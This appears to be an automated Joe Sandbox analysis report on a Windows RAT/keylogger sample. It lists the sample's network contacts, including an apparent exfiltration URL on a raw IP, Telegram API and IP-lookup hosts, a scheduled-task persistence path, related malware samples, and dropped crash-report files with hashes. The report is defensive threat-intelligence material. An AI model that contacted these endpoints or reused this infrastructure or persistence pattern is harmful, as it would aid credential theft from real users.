http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
205.147.111.116 | rasextraders.com | India | 17439 | NETMAGIC-APNetmagicDatacenterMumbaiIN | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1550765
Start date and time: 2024-11-07 06:19:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@26/20@4/4
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 190
• Number of non-executed functions: 15
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, PID 7176 because it is empty
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
00:20:03 | API Interceptor | 2x Sleep call for process: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe modified
00:20:05 | API Interceptor | 33x Sleep call for process: powershell.exe modified
00:20:08 | API Interceptor | 9941022x Sleep call for process: zDAKFK.exe modified
00:20:33 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
05:20:05 | Task Scheduler | Run new task: zDAKFK path: C:\Users\user\AppData\Roaming\zDAKFK.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | FmmYUD4pt7.wsf | Get hash | malicious | Unknown | Browse |
149.154.167.220 | 05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | x6BqJ693rc.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | doc20247622056002_pentamix.bat | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | 5gz6ZZRQWh.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | 46roqD3HEE.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | iENcsTur6E.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | 2tKeEoCCCw.exe | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
149.154.167.220 | 173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | SecuriteInfo.com.FileRepMalware.29777.16321.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
188.114.97.3 | Hesap.exe | Get hash | malicious | FormBook | Browse | www.rtprajalojago.live/74ri/
188.114.97.3 | file.exe | Get hash | malicious | LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar | Browse | sosipisos.cc/SXQNMYTM.exe
188.114.97.3 | 7RAK4mZ6nc.exe | Get hash | malicious | Metasploit | Browse | downsexv.com:8080/pptFudI4N_bZd9h2vlE2HgX6nJupnvnNvPpodtqLmxX2OC5MJtjR8Cw2hx7Jj0FM_ofkLnmJ
188.114.97.3 | Shipping documents..exe | Get hash | malicious | FormBook | Browse | www.bzxs.info/v58i/
188.114.97.3 | icRicpJWczmiOf8.exe | Get hash | malicious | FormBook | Browse | www.figa1digital.services/zjtq/
188.114.97.3 | xBA TM06-Q6-11-24.doc | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | paste.ee/d/Sv5Cw
188.114.97.3 | ffsBbRe8UN.exe | Get hash | malicious | FormBook | Browse | www.bayarcepat19.click/blmi/
188.114.97.3 | mBms4I508x.exe | Get hash | malicious | FormBook | Browse | www.casesrep.site/qagl/
188.114.97.3 | PO-000172483.exe | Get hash | malicious | FormBook | Browse | www.freedietbuilder.online/nnla/
188.114.97.3 | SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exe | Get hash | malicious | FormBook | Browse | www.vrxlzluy.shop/d8g5/
205.147.111.116 | https://investkarlo.com/udid/ | Get hash | malicious | Unknown | Browse |
205.147.111.116 | 9wk1DR95qi.exe | Get hash | malicious | AgentTesla | Browse |
205.147.111.116 | 2222093748098765434567898.exe | Get hash | malicious | AgentTesla | Browse |
193.122.130.0 | vHXObqOSGu.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | z349dth1eOtMzxuuRN.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | lN65vHBnAu.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | YvY5omjy2a.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | RFQABCO004806L____________________pdf.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | rHJM63U0Nt.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | 0oyt0YS20b.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | 20241104095027_PDF.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | Purchase order.exe | Get hash | malicious | MassLogger RAT | Browse | checkip.dyndns.org/
193.122.130.0 | Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reallyfreegeoip.org | Fiyat teklifi iste#U011fi.bat.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | Fiyat teklifi iste#U011fi.bat.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | PO#I-24-0000217.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | 05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | hesaphareketi-01.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | x6BqJ693rc.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | z349dth1eOtMzxuuRN.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
checkip.dyndns.com | Fiyat teklifi iste#U011fi.bat.exe | Get hash | malicious | Snake Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | Fiyat teklifi iste#U011fi.bat.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | PO#I-24-0000217.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | 05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.6.168
checkip.dyndns.com | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | hesaphareketi-01.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.6.168
checkip.dyndns.com | x6BqJ693rc.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | vHXObqOSGu.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
api.telegram.org | FmmYUD4pt7.wsf | Get hash | malicious | Unknown | Browse | 149.154.167.220
api.telegram.org | 05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | x6BqJ693rc.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | doc20247622056002_pentamix.bat | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | 5gz6ZZRQWh.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | iENcsTur6E.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | 2tKeEoCCCw.exe | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | 173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | SecuriteInfo.com.FileRepMalware.29777.16321.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    TELEGRAMRUhttps://berg.bergssrom.mom/fer.to.php.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.154.170.96
                                                                                                                                                                    FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    5gz6ZZRQWh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 172.67.133.135
                                                                                                                                                                    nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                    • 1.13.38.145
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                    • 104.21.5.155
                                                                                                                                                                    https://www.wallpaperflare.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                    • 104.21.5.155
                                                                                                                                                                    2pKmZ1M9Je.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 104.19.229.21
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 172.67.133.135
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Remcos, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                                                                                                                    • 104.21.5.155
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 104.21.5.155
                                                                                                                                                                    Hesap.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    ORACLE-BMC-31898USFiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    vHXObqOSGu.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    z349dth1eOtMzxuuRN.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    NETMAGIC-APNetmagicDatacenterMumbaiINla.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 123.108.36.64
                                                                                                                                                                    la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 103.225.99.96
                                                                                                                                                                    la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 203.112.146.8
                                                                                                                                                                    ATT037484_Msg#189815.htmlGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                    • 164.52.219.207
                                                                                                                                                                    na.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                    • 103.214.114.30
                                                                                                                                                                    na.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                    • 103.214.114.27
                                                                                                                                                                    http://www.ledger-secure03948.sssgva.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 103.117.156.152
                                                                                                                                                                    https://sarikarubber.com/-3001f1f2fddd/jdss/portal/dhlEN/a1b2c3/ffe5f458522a686e8e5c641bfd6a0d85/start/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 202.66.174.167
                                                                                                                                                                    Complete with Docusign amazar@actuatetherapeutics.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 103.120.179.103
                                                                                                                                                                    vnc.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 103.20.212.156
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adFiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    PO#I-24-0000217.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    z349dth1eOtMzxuuRN.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.1166071818800019
Encrypted: false
SSDEEP: 192:0EA3GlgT0BU/ya6ce36izuiF2Z24IO8h:nQGlgABU/yarVizuiF2Y4IO8h
MD5: 4BBB61980D1679FF09255A6D7F91AD4B
SHA1: A1E9E452146A8E8CB3D5ECAFB5D18A0F00113E0D
SHA-256: 8AD5760F72EDC6B30F3B3F6206A5B4FE83A1B4AFD15ACE5CB6850E233C0DB2AE
SHA-512: 6EAEB269D4129F317CB90A6DB5DD7F76F144B4CCCE6D9B31951852D732C560D008724B014499BA19564081FFF3847552CCDDEE77FB5D0CB196E5B6336AE7F333
Malicious: false
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.4.3.0.4.1.5.9.3.8.4.4.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.4.3.0.4.1.6.4.8.5.3.1.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.8.1.8.9.6.9.1.-.9.c.3.8.-.4.5.d.a.-.b.1.9.c.-.a.a.9.2.7.c.8.5.2.a.9.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.f.3.c.6.d.0.-.b.5.4.2.-.4.8.d.1.-.a.5.b.7.-.6.7.0.7.2.8.a.5.c.5.2.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.3.2...R.A.T.X.-.g.e.n...3.0.3.0...2.3.8.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.H.C.U.m.k.e.A.j.D.P.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.0.8.-.0.0.0.1.-.0.0.1.4.-.6.0.1.a.-.3.3.b.4.d.4.3.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.0.3.9.4.1.7.b.e.7.d.8.3.4.e.1.b.c.1.a.1.f.f.3.b.b.2.b.3.8.e.0.0.0.0.0.0.0.0.!.0.0.0.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Thu Nov 7 05:20:16 2024, 0x1205a4 type
Category: dropped
Size (bytes): 270198
Entropy (8bit): 3.731097297072097
Encrypted: false
SSDEEP: 1536:4PuwiKguBojRDapN4uE2aOu3SVXdCELTgdnP17NsKb0jAfSTQqN5CDGtTfU8UUl5:muHnDc4uEqmyYELTgCKgwAeUKq5iF
MD5: CE363201B6BD11AC1D822DA6AC88E5A5
SHA1: 15C412C49B72FE7D68B3F812704DEE2E50A649BE
SHA-256: B2E6EAB1A1CE12B5BD23AC3B98C11D9E45F789A7569B30D48B3E2BBB886789AE
SHA-512: 95BBF7E01AD56A62CA6562731565190FFF5082029D9EE3097260AD75281AD50BCAF91491F38DAD3FA2B7FECD93D22C1041DA88E18E22B352194C226E24B1348E
Malicious: false
                                                                                                                                                                    Preview:MDMP..a..... ........N,g............D...............X.......<....#......T%...S..........`.......8...........T............;..............,$...........&..............................................................................eJ.......&......GenuineIntel............T............N,g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 6448
Entropy (8bit): 3.7289878275782216
Encrypted: false
SSDEEP: 96:RSIU6o7wVetbYfn6omYUjv4xuQE/Z5D5aM4UT89b2GIsfQwcm:R6l7wVeJan6RY440pprT89bxIsfQbm
MD5: 3DF2B6BC047E578A8252BC14AA36331A
SHA1: 234A3F807F40E005E349A66B96E6CB064214FC2D
SHA-256: 09A67F648305B36AF97E06B2D8EE27DE44630058F8E09CF6945504105D29F8EA
SHA-512: 5F968603C8114033A62B43F0FF5EC2D34953A852A73AC078B1438E6F89432A42ACC4C5510465ADAB726D3190514CD7AAA30F2271D9EE332C53382BF36C51C9CA
Malicious: false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.7.6.<./.P.i.

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4822
Entropy (8bit):4.568620513503551
Encrypted:false
SSDEEP:48:cvIwWl8zszJg77aI9JWWpW8VYBPYm8M4JajFmmo+q8Si4VZeZd:uIjfNI7r37VcSJZmoycZud
MD5:C842AC48BE59E431637BB4D53C56318B
SHA1:3D7426CFCAE0FD4AC382DF790ADF9E38141D10A1
SHA-256:5AFC5E3E4B32956AD55EF19E3FC1DBB5CD5E8AAEB03724DAEBD1EA2DA61B59DA
SHA-512:7A7DADD856F11EB85CA4C6595EDC109E92F7E0B6653FD0F3EE13D2A06C56A53155A16D5D282370530FF7CCD7B8D48E9E05984E60319D054A1ACCFA7FC426C9CB
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="577222" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1216
Entropy (8bit):5.34331486778365
Encrypted:false
SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:1330C80CAAC9A0FB172F202485E9B1E8
SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:true
